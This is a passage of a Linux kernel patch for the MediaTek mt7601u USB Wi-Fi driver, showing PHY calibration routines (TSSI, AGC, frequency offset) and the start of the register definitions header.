? 819 : 24576; + } + + p.trgt_power += static_power[mt7601u_bbp_rr(dev, 1) & 0x03]; + + p.trgt_power += dev->ee->tssi_data.tx0_delta_offset; + + dev_dbg(dev->dev, + "tssi:%02hhx t_power:%08x temp:%02hhx pkt_type:%02hhx\n", + p.tssi0, p.trgt_power, dev->raw_temp, pkt_type); + + return p; +} + +static bool mt7601u_tssi_read_ready(struct mt7601u_dev *dev) +{ + return !(mt7601u_bbp_rr(dev, 47) & 0x10); +} + +static int mt7601u_tssi_cal(struct mt7601u_dev *dev) +{ + struct mt7601u_tssi_params params; + int curr_pwr, diff_pwr; + char tssi_offset; + s8 tssi_init; + s16 tssi_m_dc, tssi_db; + bool hvga; + u32 val; + + if (!dev->ee->tssi_enabled) + return 0; + + hvga = mt7601u_use_hvga(dev); + if (!dev->tssi_read_trig) + return mt7601u_mcu_tssi_read_kick(dev, hvga); + + if (!mt7601u_tssi_read_ready(dev)) + return 0; + + params = mt7601u_tssi_params_get(dev); + + tssi_init = (hvga ? dev->tssi_init_hvga : dev->tssi_init); + tssi_m_dc = params.tssi0 - tssi_init; + tssi_db = lin2dBd(tssi_m_dc); + dev_dbg(dev->dev, "tssi dc:%04hx db:%04hx hvga:%d\n", + tssi_m_dc, tssi_db, hvga); + + if (dev->chandef.chan->hw_value < 5) + tssi_offset = dev->ee->tssi_data.offset[0]; + else if (dev->chandef.chan->hw_value < 9) + tssi_offset = dev->ee->tssi_data.offset[1]; + else + tssi_offset = dev->ee->tssi_data.offset[2]; + + if (hvga) + tssi_db -= dev->tssi_init_hvga_offset_db; + + curr_pwr = tssi_db * dev->ee->tssi_data.slope + (tssi_offset << 9); + diff_pwr = params.trgt_power - curr_pwr; + dev_dbg(dev->dev, "Power curr:%08x diff:%08x\n", curr_pwr, diff_pwr); + + if (params.tssi0 > 126 && diff_pwr > 0) { + dev_err(dev->dev, "Error: TSSI upper saturation\n"); + diff_pwr = 0; + } + if (params.tssi0 - tssi_init < 1 && diff_pwr < 0) { + dev_err(dev->dev, "Error: TSSI lower saturation\n"); + diff_pwr = 0; + } + + if ((dev->prev_pwr_diff ^ diff_pwr) < 0 && abs(diff_pwr) < 4096 && + (abs(diff_pwr) > abs(dev->prev_pwr_diff) || + (diff_pwr > 0 && diff_pwr == -dev->prev_pwr_diff))) + diff_pwr = 0; + else + dev->prev_pwr_diff = diff_pwr; + + diff_pwr += (diff_pwr > 0) ? 2048 : -2048; + diff_pwr /= 4096; + + dev_dbg(dev->dev, "final diff: %08x\n", diff_pwr); + + val = mt7601u_rr(dev, MT_TX_ALC_CFG_1); + curr_pwr = s6_to_int(MT76_GET(MT_TX_ALC_CFG_1_TEMP_COMP, val)); + diff_pwr += curr_pwr; + val = (val & ~MT_TX_ALC_CFG_1_TEMP_COMP) | int_to_s6(diff_pwr); + mt7601u_wr(dev, MT_TX_ALC_CFG_1, val); + + return mt7601u_mcu_tssi_read_kick(dev, hvga); +} + +static u8 mt7601u_agc_default(struct mt7601u_dev *dev) +{ + return (dev->ee->lna_gain - 8) * 2 + 0x34; +} + +static void mt7601u_agc_reset(struct mt7601u_dev *dev) +{ + u8 agc = mt7601u_agc_default(dev); + + mt7601u_bbp_wr(dev, 66, agc); +} + +void mt7601u_agc_save(struct mt7601u_dev *dev) +{ + dev->agc_save = mt7601u_bbp_rr(dev, 66); +} + +void mt7601u_agc_restore(struct mt7601u_dev *dev) +{ + mt7601u_bbp_wr(dev, 66, dev->agc_save); +} + +static void mt7601u_agc_tune(struct mt7601u_dev *dev) +{ + u8 val = mt7601u_agc_default(dev); + + if (test_bit(MT7601U_STATE_SCANNING, &dev->state)) + return; + + /* Note: only in STA mode and not dozing; perhaps do this only if + * there is enough rssi updates since last run? + * Rssi updates are only on beacons and U2M so should work... + */ + spin_lock_bh(&dev->con_mon_lock); + if (dev->avg_rssi <= -70) + val -= 0x20; + else if (dev->avg_rssi <= -60) + val -= 0x10; + spin_unlock_bh(&dev->con_mon_lock); + + if (val != mt7601u_bbp_rr(dev, 66)) + mt7601u_bbp_wr(dev, 66, val); + + /* TODO: also if lost a lot of beacons try resetting + * (see RTMPSetAGCInitValue() call in mlme.c). + */ +} + +static void mt7601u_phy_calibrate(struct work_struct *work) +{ + struct mt7601u_dev *dev = container_of(work, struct mt7601u_dev, + cal_work.work); + + mt7601u_agc_tune(dev); + mt7601u_tssi_cal(dev); + /* If TSSI calibration was run it already updated temperature. */ + if (!dev->ee->tssi_enabled) + dev->raw_temp = mt7601u_read_temp(dev); + mt7601u_temp_comp(dev, true); /* TODO: find right value for @on */ + + ieee80211_queue_delayed_work(dev->hw, &dev->cal_work, + MT_CALIBRATE_INTERVAL); +} + +static unsigned long +__mt7601u_phy_freq_cal(struct mt7601u_dev *dev, s8 last_offset, u8 phy_mode) +{ + u8 activate_threshold, deactivate_threshold; + + trace_freq_cal_offset(dev, phy_mode, last_offset); + + /* No beacons received - reschedule soon */ + if (last_offset == MT_FREQ_OFFSET_INVALID) + return MT_FREQ_CAL_ADJ_INTERVAL; + + switch (phy_mode) { + case MT_PHY_TYPE_CCK: + activate_threshold = 19; + deactivate_threshold = 5; + break; + case MT_PHY_TYPE_OFDM: + activate_threshold = 102; + deactivate_threshold = 32; + break; + case MT_PHY_TYPE_HT: + case MT_PHY_TYPE_HT_GF: + activate_threshold = 82; + deactivate_threshold = 20; + break; + default: + WARN_ON(1); + return MT_FREQ_CAL_CHECK_INTERVAL; + } + + if (abs(last_offset) >= activate_threshold) + dev->freq_cal.adjusting = true; + else if (abs(last_offset) <= deactivate_threshold) + dev->freq_cal.adjusting = false; + + if (!dev->freq_cal.adjusting) + return MT_FREQ_CAL_CHECK_INTERVAL; + + if (last_offset > deactivate_threshold) { + if (dev->freq_cal.freq > 0) + dev->freq_cal.freq--; + else + dev->freq_cal.adjusting = false; + } else if (last_offset < -deactivate_threshold) { + if (dev->freq_cal.freq < 0xbf) + dev->freq_cal.freq++; + else + dev->freq_cal.adjusting = false; + } + + trace_freq_cal_adjust(dev, dev->freq_cal.freq); + mt7601u_rf_wr(dev, 0, 12, dev->freq_cal.freq); + mt7601u_vco_cal(dev); + + return dev->freq_cal.adjusting ? MT_FREQ_CAL_ADJ_INTERVAL : + MT_FREQ_CAL_CHECK_INTERVAL; +} + +static void mt7601u_phy_freq_cal(struct work_struct *work) +{ + struct mt7601u_dev *dev = container_of(work, struct mt7601u_dev, + freq_cal.work.work); + s8 last_offset; + u8 phy_mode; + unsigned long delay; + + spin_lock_bh(&dev->con_mon_lock); + last_offset = dev->bcn_freq_off; + phy_mode = dev->bcn_phy_mode; + spin_unlock_bh(&dev->con_mon_lock); + + delay = __mt7601u_phy_freq_cal(dev, last_offset, phy_mode); + ieee80211_queue_delayed_work(dev->hw, &dev->freq_cal.work, delay); + + spin_lock_bh(&dev->con_mon_lock); + dev->bcn_freq_off = MT_FREQ_OFFSET_INVALID; + spin_unlock_bh(&dev->con_mon_lock); +} + +void mt7601u_phy_con_cal_onoff(struct mt7601u_dev *dev, + struct ieee80211_bss_conf *info) +{ + if (!info->assoc) + cancel_delayed_work_sync(&dev->freq_cal.work); + + /* Start/stop collecting beacon data */ + spin_lock_bh(&dev->con_mon_lock); + ether_addr_copy(dev->ap_bssid, info->bssid); + dev->avg_rssi = 0; + dev->bcn_freq_off = MT_FREQ_OFFSET_INVALID; + spin_unlock_bh(&dev->con_mon_lock); + + dev->freq_cal.freq = dev->ee->rf_freq_off; + dev->freq_cal.enabled = info->assoc; + dev->freq_cal.adjusting = false; + + if (info->assoc) + ieee80211_queue_delayed_work(dev->hw, &dev->freq_cal.work, + MT_FREQ_CAL_INIT_DELAY); +} + +static int mt7601u_init_cal(struct mt7601u_dev *dev) +{ + u32 mac_ctrl; + int ret; + + dev->raw_temp = mt7601u_read_bootup_temp(dev); + dev->curr_temp = (dev->raw_temp - dev->ee->ref_temp) * + MT_EE_TEMPERATURE_SLOPE; + dev->dpd_temp = dev->curr_temp; + + mac_ctrl = mt7601u_rr(dev, MT_MAC_SYS_CTRL); + + ret = mt7601u_mcu_calibrate(dev, MCU_CAL_R, 0); + if (ret) + return ret; + + ret = mt7601u_rf_rr(dev, 0, 4); + if (ret < 0) + return ret; + ret |= 0x80; + ret = mt7601u_rf_wr(dev, 0, 4, ret); + if (ret) + return ret; + msleep(2); + + ret = mt7601u_mcu_calibrate(dev, MCU_CAL_TXDCOC, 0); + if (ret) + return ret; + + mt7601u_rxdc_cal(dev); + + ret = mt7601u_set_bw_filter(dev, true); + if (ret) + return ret; + ret = mt7601u_mcu_calibrate(dev, MCU_CAL_LOFT, 0); + if (ret) + return ret; + ret = mt7601u_mcu_calibrate(dev, MCU_CAL_TXIQ, 0); + if (ret) + return ret; + ret = mt7601u_mcu_calibrate(dev, MCU_CAL_RXIQ, 0); + if (ret) + return ret; + ret = mt7601u_mcu_calibrate(dev, MCU_CAL_DPD, dev->dpd_temp); + if (ret) + return ret; + + mt7601u_rxdc_cal(dev); + + mt7601u_tssi_dc_gain_cal(dev); + + mt7601u_wr(dev, MT_MAC_SYS_CTRL, mac_ctrl); + + mt7601u_temp_comp(dev, true); + + return 0; +} + +int mt7601u_bbp_set_bw(struct mt7601u_dev *dev, int bw) +{ + u32 val, old; + + if (bw == dev->bw) { + /* Vendor driver does the rmc even when no change is needed. */ + mt7601u_bbp_rmc(dev, 4, 0x18, bw == MT_BW_20 ? 0 : 0x10); + + return 0; + } + dev->bw = bw; + + /* Stop MAC for the time of bw change */ + old = mt7601u_rr(dev, MT_MAC_SYS_CTRL); + val = old & ~(MT_MAC_SYS_CTRL_ENABLE_TX | MT_MAC_SYS_CTRL_ENABLE_RX); + mt7601u_wr(dev, MT_MAC_SYS_CTRL, val); + mt76_poll(dev, MT_MAC_STATUS, MT_MAC_STATUS_TX | MT_MAC_STATUS_RX, + 0, 500000); + + mt7601u_bbp_rmc(dev, 4, 0x18, bw == MT_BW_20 ? 0 : 0x10); + + mt7601u_wr(dev, MT_MAC_SYS_CTRL, old); + + return mt7601u_load_bbp_temp_table_bw(dev); +} + +/** + * mt7601u_set_rx_path - set rx path in BBP + * @dev: pointer to adapter structure + * @path: rx path to set values are 0-based + */ +void mt7601u_set_rx_path(struct mt7601u_dev *dev, u8 path) +{ + mt7601u_bbp_rmw(dev, 3, 0x18, path << 3); +} + +/** + * mt7601u_set_tx_dac - set which tx DAC to use + * @dev: pointer to adapter structure + * @path: DAC index, values are 0-based + */ +void mt7601u_set_tx_dac(struct mt7601u_dev *dev, u8 dac) +{ + mt7601u_bbp_rmc(dev, 1, 0x18, dac << 3); +} + +int mt7601u_phy_init(struct mt7601u_dev *dev) +{ + int ret; + + dev->rf_pa_mode[0] = mt7601u_rr(dev, MT_RF_PA_MODE_CFG0); + dev->rf_pa_mode[1] = mt7601u_rr(dev, MT_RF_PA_MODE_CFG1); + + ret = mt7601u_rf_wr(dev, 0, 12, dev->ee->rf_freq_off); + if (ret) + return ret; + ret = mt7601u_write_reg_pairs(dev, 0, rf_central, + ARRAY_SIZE(rf_central)); + if (ret) + return ret; + ret = mt7601u_write_reg_pairs(dev, 0, rf_channel, + ARRAY_SIZE(rf_channel)); + if (ret) + return ret; + ret = mt7601u_write_reg_pairs(dev, 0, rf_vga, ARRAY_SIZE(rf_vga)); + if (ret) + return ret; + + ret = mt7601u_init_cal(dev); + if (ret) + return ret; + + dev->prev_pwr_diff = 100; + + INIT_DELAYED_WORK(&dev->cal_work, mt7601u_phy_calibrate); + INIT_DELAYED_WORK(&dev->freq_cal.work, mt7601u_phy_freq_cal); + + return 0; +} diff --git a/drivers/net/wireless/mediatek/mt7601u/regs.h b/drivers/net/wireless/mediatek/mt7601u/regs.h new file mode 100644 index 000000000000..afd8978e83fa --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/regs.h @@ -0,0 +1,636 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#ifndef __MT76_REGS_H +#define __MT76_REGS_H + +#include + +#ifndef GENMASK +#define GENMASK(h, l) (((U32_C(1) << ((h) - (l) + 1)) - 1) << (l)) +#endif + +#define MT_ASIC_VERSION 0x0000 + +#define MT76XX_REV_E3 0x22 +#define MT76XX_REV_E4 0x33 + +#define MT_CMB_CTRL 0x0020 +#define MT_CMB_CTRL_XTAL_RDY BIT(22) +#define MT_CMB_CTRL_PLL_LD BIT(23) + +#define MT_EFUSE_CTRL 0x0024 +#define MT_EFUSE_CTRL_AOUT GENMASK(5, 0) +#define MT_EFUSE_CTRL_MODE GENMASK(7, 6) +#define MT_EFUSE_CTRL_LDO_OFF_TIME GENMASK(13, 8) +#define MT_EFUSE_CTRL_LDO_ON_TIME GENMASK(15, 14) +#define MT_EFUSE_CTRL_AIN GENMASK(25, 16) +#define MT_EFUSE_CTRL_KICK BIT(30) +#define MT_EFUSE_CTRL_SEL BIT(31) + +#define MT_EFUSE_DATA_BASE 0x0028 +#define MT_EFUSE_DATA(_n) (MT_EFUSE_DATA_BASE + ((_n) << 2)) + +#define MT_COEXCFG0 0x0040 +#define MT_COEXCFG0_COEX_EN BIT(0) + +#define MT_WLAN_FUN_CTRL 0x0080 +#define MT_WLAN_FUN_CTRL_WLAN_EN BIT(0) +#define MT_WLAN_FUN_CTRL_WLAN_CLK_EN BIT(1) +#define MT_WLAN_FUN_CTRL_WLAN_RESET_RF BIT(2) + +#define MT_WLAN_FUN_CTRL_WLAN_RESET BIT(3) /* MT76x0 */ +#define MT_WLAN_FUN_CTRL_CSR_F20M_CKEN BIT(3) /* MT76x2 */ + +#define MT_WLAN_FUN_CTRL_PCIE_CLK_REQ BIT(4) +#define MT_WLAN_FUN_CTRL_FRC_WL_ANT_SEL BIT(5) +#define MT_WLAN_FUN_CTRL_INV_ANT_SEL BIT(6) +#define MT_WLAN_FUN_CTRL_WAKE_HOST BIT(7) + +#define MT_WLAN_FUN_CTRL_THERM_RST BIT(8) /* MT76x2 */ +#define MT_WLAN_FUN_CTRL_THERM_CKEN BIT(9) /* MT76x2 */ + +#define MT_WLAN_FUN_CTRL_GPIO_IN GENMASK(15, 8) /* MT76x0 */ +#define MT_WLAN_FUN_CTRL_GPIO_OUT GENMASK(23, 16) /* MT76x0 */ +#define MT_WLAN_FUN_CTRL_GPIO_OUT_EN GENMASK(31, 24) /* MT76x0 */ + +#define MT_XO_CTRL0 0x0100 +#define MT_XO_CTRL1 0x0104 +#define MT_XO_CTRL2 0x0108 +#define MT_XO_CTRL3 0x010c +#define MT_XO_CTRL4 0x0110 + +#define MT_XO_CTRL5 0x0114 +#define MT_XO_CTRL5_C2_VAL GENMASK(14, 8) + +#define MT_XO_CTRL6 0x0118 +#define MT_XO_CTRL6_C2_CTRL GENMASK(14, 8) + +#define MT_XO_CTRL7 0x011c + +#define MT_WLAN_MTC_CTRL 0x10148 +#define MT_WLAN_MTC_CTRL_MTCMOS_PWR_UP BIT(0) +#define MT_WLAN_MTC_CTRL_PWR_ACK BIT(12) +#define MT_WLAN_MTC_CTRL_PWR_ACK_S BIT(13) +#define MT_WLAN_MTC_CTRL_BBP_MEM_PD GENMASK(19, 16) +#define MT_WLAN_MTC_CTRL_PBF_MEM_PD BIT(20) +#define MT_WLAN_MTC_CTRL_FCE_MEM_PD BIT(21) +#define MT_WLAN_MTC_CTRL_TSO_MEM_PD BIT(22) +#define MT_WLAN_MTC_CTRL_BBP_MEM_RB BIT(24) +#define MT_WLAN_MTC_CTRL_PBF_MEM_RB BIT(25) +#define MT_WLAN_MTC_CTRL_FCE_MEM_RB BIT(26) +#define MT_WLAN_MTC_CTRL_TSO_MEM_RB BIT(27) +#define MT_WLAN_MTC_CTRL_STATE_UP BIT(28) + +#define MT_INT_SOURCE_CSR 0x0200 +#define MT_INT_MASK_CSR 0x0204 + +#define MT_INT_RX_DONE(_n) BIT(_n) +#define MT_INT_RX_DONE_ALL GENMASK(1, 0) +#define MT_INT_TX_DONE_ALL GENMASK(13, 4) +#define MT_INT_TX_DONE(_n) BIT(_n + 4) +#define MT_INT_RX_COHERENT BIT(16) +#define MT_INT_TX_COHERENT BIT(17) +#define MT_INT_ANY_COHERENT BIT(18) +#define MT_INT_MCU_CMD BIT(19) +#define MT_INT_TBTT BIT(20) +#define MT_INT_PRE_TBTT BIT(21) +#define MT_INT_TX_STAT BIT(22) +#define MT_INT_AUTO_WAKEUP BIT(23) +#define MT_INT_GPTIMER BIT(24) +#define MT_INT_RXDELAYINT BIT(26) +#define MT_INT_TXDELAYINT BIT(27) + +#define MT_WPDMA_GLO_CFG 0x0208 +#define MT_WPDMA_GLO_CFG_TX_DMA_EN BIT(0) +#define MT_WPDMA_GLO_CFG_TX_DMA_BUSY BIT(1) +#define MT_WPDMA_GLO_CFG_RX_DMA_EN BIT(2) +#define MT_WPDMA_GLO_CFG_RX_DMA_BUSY BIT(3) +#define MT_WPDMA_GLO_CFG_DMA_BURST_SIZE GENMASK(5, 4) +#define MT_WPDMA_GLO_CFG_TX_WRITEBACK_DONE BIT(6) +#define MT_WPDMA_GLO_CFG_BIG_ENDIAN BIT(7) +#define MT_WPDMA_GLO_CFG_HDR_SEG_LEN GENMASK(15, 8) +#define MT_WPDMA_GLO_CFG_CLK_GATE_DIS BIT(30) +#define MT_WPDMA_GLO_CFG_RX_2B_OFFSET BIT(31) + +#define MT_WPDMA_RST_IDX 0x020c + +#define MT_WPDMA_DELAY_INT_CFG 0x0210 + +#define MT_WMM_AIFSN 0x0214 +#define MT_WMM_AIFSN_MASK GENMASK(3, 0) +#define MT_WMM_AIFSN_SHIFT(_n) ((_n) * 4) + +#define MT_WMM_CWMIN 0x0218 +#define MT_WMM_CWMIN_MASK GENMASK(3, 0) +#define MT_WMM_CWMIN_SHIFT(_n) ((_n) * 4) + +#define MT_WMM_CWMAX 0x021c +#define MT_WMM_CWMAX_MASK GENMASK(3, 0) +#define MT_WMM_CWMAX_SHIFT(_n) ((_n) * 4) + +#define MT_WMM_TXOP_BASE 0x0220 +#define MT_WMM_TXOP(_n) (MT_WMM_TXOP_BASE + (((_n) / 2) << 2)) +#define MT_WMM_TXOP_SHIFT(_n) ((_n & 1) * 16) +#define MT_WMM_TXOP_MASK GENMASK(15, 0) + +#define MT_FCE_DMA_ADDR 0x0230 +#define MT_FCE_DMA_LEN 0x0234 + +#define MT_USB_DMA_CFG 0x238 +#define MT_USB_DMA_CFG_RX_BULK_AGG_TOUT GENMASK(7, 0) +#define MT_USB_DMA_CFG_RX_BULK_AGG_LMT GENMASK(15, 8) +#define MT_USB_DMA_CFG_PHY_CLR BIT(16) +#define MT_USB_DMA_CFG_TX_CLR BIT(19) +#define MT_USB_DMA_CFG_TXOP_HALT BIT(20) +#define MT_USB_DMA_CFG_RX_BULK_AGG_EN BIT(21) +#define MT_USB_DMA_CFG_RX_BULK_EN BIT(22) +#define MT_USB_DMA_CFG_TX_BULK_EN BIT(23) +#define MT_USB_DMA_CFG_UDMA_RX_WL_DROP BIT(25) +#define MT_USB_DMA_CFG_EP_OUT_VALID GENMASK(29, 27) +#define MT_USB_DMA_CFG_RX_BUSY BIT(30) +#define MT_USB_DMA_CFG_TX_BUSY BIT(31) + +#define MT_TSO_CTRL 0x0250 +#define MT_HEADER_TRANS_CTRL_REG 0x0260 + +#define MT_US_CYC_CFG 0x02a4 +#define MT_US_CYC_CNT GENMASK(7, 0) + +#define MT_TX_RING_BASE 0x0300 +#define MT_RX_RING_BASE 0x03c0 +#define MT_RING_SIZE 0x10 + +#define MT_TX_HW_QUEUE_MCU 8 +#define MT_TX_HW_QUEUE_MGMT 9 + +#define MT_PBF_SYS_CTRL 0x0400 +#define MT_PBF_SYS_CTRL_MCU_RESET BIT(0) +#define MT_PBF_SYS_CTRL_DMA_RESET BIT(1) +#define MT_PBF_SYS_CTRL_MAC_RESET BIT(2) +#define MT_PBF_SYS_CTRL_PBF_RESET BIT(3) +#define MT_PBF_SYS_CTRL_ASY_RESET BIT(4) + +#define MT_PBF_CFG 0x0404 +#define MT_PBF_CFG_TX0Q_EN BIT(0) +#define MT_PBF_CFG_TX1Q_EN BIT(1) +#define MT_PBF_CFG_TX2Q_EN BIT(2) +#define MT_PBF_CFG_TX3Q_EN BIT(3) +#define MT_PBF_CFG_RX0Q_EN BIT(4) +#define MT_PBF_CFG_RX_DROP_EN BIT(8) + +#define MT_PBF_TX_MAX_PCNT 0x0408 +#define MT_PBF_RX_MAX_PCNT 0x040c + +#define MT_BCN_OFFSET_BASE 0x041c +#define MT_BCN_OFFSET(_n) (MT_BCN_OFFSET_BASE + ((_n) << 2)) + +#define MT_RF_CSR_CFG 0x0500 +#define MT_RF_CSR_CFG_DATA GENMASK(7, 0) +#define MT_RF_CSR_CFG_REG_ID GENMASK(13, 8) +#define MT_RF_CSR_CFG_REG_BANK GENMASK(17, 14) +#define MT_RF_CSR_CFG_WR BIT(30) +#define MT_RF_CSR_CFG_KICK BIT(31) + +#define MT_RF_BYPASS_0 0x0504 +#define MT_RF_BYPASS_1 0x0508 +#define MT_RF_SETTING_0 0x050c + +#define MT_RF_DATA_WRITE 0x0524 + +#define MT_RF_CTRL 0x0528 +#define MT_RF_CTRL_ADDR GENMASK(11, 0) +#define MT_RF_CTRL_WRITE BIT(12) +#define MT_RF_CTRL_BUSY BIT(13) +#define MT_RF_CTRL_IDX BIT(16) + +#define MT_RF_DATA_READ 0x052c + +#define MT_FCE_PSE_CTRL 0x0800 +#define MT_FCE_PARAMETERS 0x0804 +#define MT_FCE_CSO 0x0808 + +#define MT_FCE_L2_STUFF 0x080c +#define MT_FCE_L2_STUFF_HT_L2_EN BIT(0) +#define MT_FCE_L2_STUFF_QOS_L2_EN BIT(1) +#define MT_FCE_L2_STUFF_RX_STUFF_EN BIT(2) +#define MT_FCE_L2_STUFF_TX_STUFF_EN BIT(3) +#define MT_FCE_L2_STUFF_WR_MPDU_LEN_EN BIT(4) +#define MT_FCE_L2_STUFF_MVINV_BSWAP BIT(5) +#define MT_FCE_L2_STUFF_TS_CMD_QSEL_EN GENMASK(15, 8) +#define MT_FCE_L2_STUFF_TS_LEN_EN GENMASK(23, 16) +#define MT_FCE_L2_STUFF_OTHER_PORT GENMASK(25, 24) + +#define MT_FCE_WLAN_FLOW_CONTROL1 0x0824 + +#define MT_TX_CPU_FROM_FCE_BASE_PTR 0x09a0 +#define MT_TX_CPU_FROM_FCE_MAX_COUNT 0x09a4 +#define MT_TX_CPU_FROM_FCE_CPU_DESC_IDX 0x09a8 + +#define MT_FCE_PDMA_GLOBAL_CONF 0x09c4 + +#define MT_PAUSE_ENABLE_CONTROL1 0x0a38 + +#define MT_FCE_SKIP_FS 0x0a6c + +#define MT_MAC_CSR0 0x1000 + +#define MT_MAC_SYS_CTRL 0x1004 +#define MT_MAC_SYS_CTRL_RESET_CSR BIT(0) +#define MT_MAC_SYS_CTRL_RESET_BBP BIT(1) +#define MT_MAC_SYS_CTRL_ENABLE_TX BIT(2) +#define MT_MAC_SYS_CTRL_ENABLE_RX BIT(3) + +#define MT_MAC_ADDR_DW0 0x1008 +#define MT_MAC_ADDR_DW1 0x100c +#define MT_MAC_ADDR_DW1_U2ME_MASK GENMASK(23, 16) + +#define MT_MAC_BSSID_DW0 0x1010 +#define MT_MAC_BSSID_DW1 0x1014 +#define MT_MAC_BSSID_DW1_ADDR GENMASK(15, 0) +#define MT_MAC_BSSID_DW1_MBSS_MODE GENMASK(17, 16) +#define MT_MAC_BSSID_DW1_MBEACON_N GENMASK(20, 18) +#define MT_MAC_BSSID_DW1_MBSS_LOCAL_BIT BIT(21) +#define MT_MAC_BSSID_DW1_MBSS_MODE_B2 BIT(22) +#define MT_MAC_BSSID_DW1_MBEACON_N_B3 BIT(23) +#define MT_MAC_BSSID_DW1_MBSS_IDX_BYTE GENMASK(26, 24) + +#define MT_MAX_LEN_CFG 0x1018 +#define MT_MAX_LEN_CFG_AMPDU GENMASK(13, 12) + +#define MT_BBP_CSR_CFG 0x101c +#define MT_BBP_CSR_CFG_VAL GENMASK(7, 0) +#define MT_BBP_CSR_CFG_REG_NUM GENMASK(15, 8) +#define MT_BBP_CSR_CFG_READ BIT(16) +#define MT_BBP_CSR_CFG_BUSY BIT(17) +#define MT_BBP_CSR_CFG_PAR_DUR BIT(18) +#define MT_BBP_CSR_CFG_RW_MODE BIT(19) + +#define MT_AMPDU_MAX_LEN_20M1S 0x1030 +#define MT_AMPDU_MAX_LEN_20M2S 0x1034 +#define MT_AMPDU_MAX_LEN_40M1S 0x1038 +#define MT_AMPDU_MAX_LEN_40M2S 0x103c +#define MT_AMPDU_MAX_LEN 0x1040 + +#define MT_WCID_DROP_BASE 0x106c +#define MT_WCID_DROP(_n) (MT_WCID_DROP_BASE + ((_n) >> 5) * 4) +#define MT_WCID_DROP_MASK(_n) BIT((_n) % 32) + +#define MT_BCN_BYPASS_MASK 0x108c + +#define MT_MAC_APC_BSSID_BASE 0x1090 +#define MT_MAC_APC_BSSID_L(_n) (MT_MAC_APC_BSSID_BASE + ((_n) * 8)) +#define MT_MAC_APC_BSSID_H(_n) (MT_MAC_APC_BSSID_BASE + ((_n) * 8 + 4)) +#define MT_MAC_APC_BSSID_H_ADDR GENMASK(15, 0) +#define MT_MAC_APC_BSSID0_H_EN BIT(16) + +#define MT_XIFS_TIME_CFG 0x1100 +#define MT_XIFS_TIME_CFG_CCK_SIFS GENMASK(7, 0) +#define MT_XIFS_TIME_CFG_OFDM_SIFS GENMASK(15, 8) +#define MT_XIFS_TIME_CFG_OFDM_XIFS GENMASK(19, 16) +#define MT_XIFS_TIME_CFG_EIFS GENMASK(28, 20) +#define MT_XIFS_TIME_CFG_BB_RXEND_EN BIT(29) + +#define MT_BKOFF_SLOT_CFG 0x1104 +#define MT_BKOFF_SLOT_CFG_SLOTTIME GENMASK(7, 0) +#define MT_BKOFF_SLOT_CFG_CC_DELAY GENMASK(11, 8) + +#define MT_BEACON_TIME_CFG 0x1114 +#define MT_BEACON_TIME_CFG_INTVAL GENMASK(15, 0) +#define MT_BEACON_TIME_CFG_TIMER_EN BIT(16) +#define MT_BEACON_TIME_CFG_SYNC_MODE GENMASK(18, 17) +#define MT_BEACON_TIME_CFG_TBTT_EN BIT(19) +#define MT_BEACON_TIME_CFG_BEACON_TX BIT(20) +#define MT_BEACON_TIME_CFG_TSF_COMP GENMASK(31, 24) + +#define MT_TBTT_SYNC_CFG 0x1118 +#define MT_TBTT_TIMER_CFG 0x1124 + +#define MT_INT_TIMER_CFG 0x1128 +#define MT_INT_TIMER_CFG_PRE_TBTT GENMASK(15, 0) +#define MT_INT_TIMER_CFG_GP_TIMER GENMASK(31, 16) + +#define MT_INT_TIMER_EN 0x112c +#define MT_INT_TIMER_EN_PRE_TBTT_EN BIT(0) +#define MT_INT_TIMER_EN_GP_TIMER_EN BIT(1) + +#define MT_MAC_STATUS 0x1200 +#define MT_MAC_STATUS_TX BIT(0) +#define MT_MAC_STATUS_RX BIT(1) + +#define MT_PWR_PIN_CFG 0x1204 +#define MT_AUX_CLK_CFG 0x120c + +#define MT_BB_PA_MODE_CFG0 0x1214 +#define MT_BB_PA_MODE_CFG1 0x1218 +#define MT_RF_PA_MODE_CFG0 0x121c +#define MT_RF_PA_MODE_CFG1 0x1220 + +#define MT_RF_PA_MODE_ADJ0 0x1228 +#define MT_RF_PA_MODE_ADJ1 0x122c + +#define MT_DACCLK_EN_DLY_CFG 0x1264 + +#define MT_EDCA_CFG_BASE 0x1300 +#define MT_EDCA_CFG_AC(_n) (MT_EDCA_CFG_BASE + ((_n) << 2)) +#define MT_EDCA_CFG_TXOP GENMASK(7, 0) +#define MT_EDCA_CFG_AIFSN GENMASK(11, 8) +#define MT_EDCA_CFG_CWMIN GENMASK(15, 12) +#define MT_EDCA_CFG_CWMAX GENMASK(19, 16) + +#define MT_TX_PWR_CFG_0 0x1314 +#define MT_TX_PWR_CFG_1 0x1318 +#define MT_TX_PWR_CFG_2 0x131c +#define MT_TX_PWR_CFG_3 0x1320 +#define MT_TX_PWR_CFG_4 0x1324 + +#define MT_TX_BAND_CFG 0x132c +#define MT_TX_BAND_CFG_UPPER_40M BIT(0) +#define MT_TX_BAND_CFG_5G BIT(1) +#define MT_TX_BAND_CFG_2G BIT(2) + +#define MT_HT_FBK_TO_LEGACY 0x1384 +#define MT_TX_MPDU_ADJ_INT 0x1388 + +#define MT_TX_PWR_CFG_7 0x13d4 +#define MT_TX_PWR_CFG_8 0x13d8 +#define MT_TX_PWR_CFG_9 0x13dc + +#define MT_TX_SW_CFG0 0x1330 +#define MT_TX_SW_CFG1 0x1334 +#define MT_TX_SW_CFG2 0x1338 + +#define MT_TXOP_CTRL_CFG 0x1340 +#define MT_TXOP_TRUN_EN GENMASK(5, 0) +#define MT_TXOP_EXT_CCA_DLY GENMASK(15, 8) +#define MT_TXOP_CTRL + +#define MT_TX_RTS_CFG 0x1344 +#define MT_TX_RTS_CFG_RETRY_LIMIT GENMASK(7, 0) +#define MT_TX_RTS_CFG_THRESH GENMASK(23, 8) +#define MT_TX_RTS_FALLBACK BIT(24) + +#define MT_TX_TIMEOUT_CFG 0x1348 +#define MT_TX_RETRY_CFG 0x134c +#define MT_TX_LINK_CFG 0x1350 +#define MT_HT_FBK_CFG0 0x1354 +#define MT_HT_FBK_CFG1 0x1358 +#define MT_LG_FBK_CFG0 0x135c +#define MT_LG_FBK_CFG1 0x1360 + +#define MT_CCK_PROT_CFG 0x1364 +#define 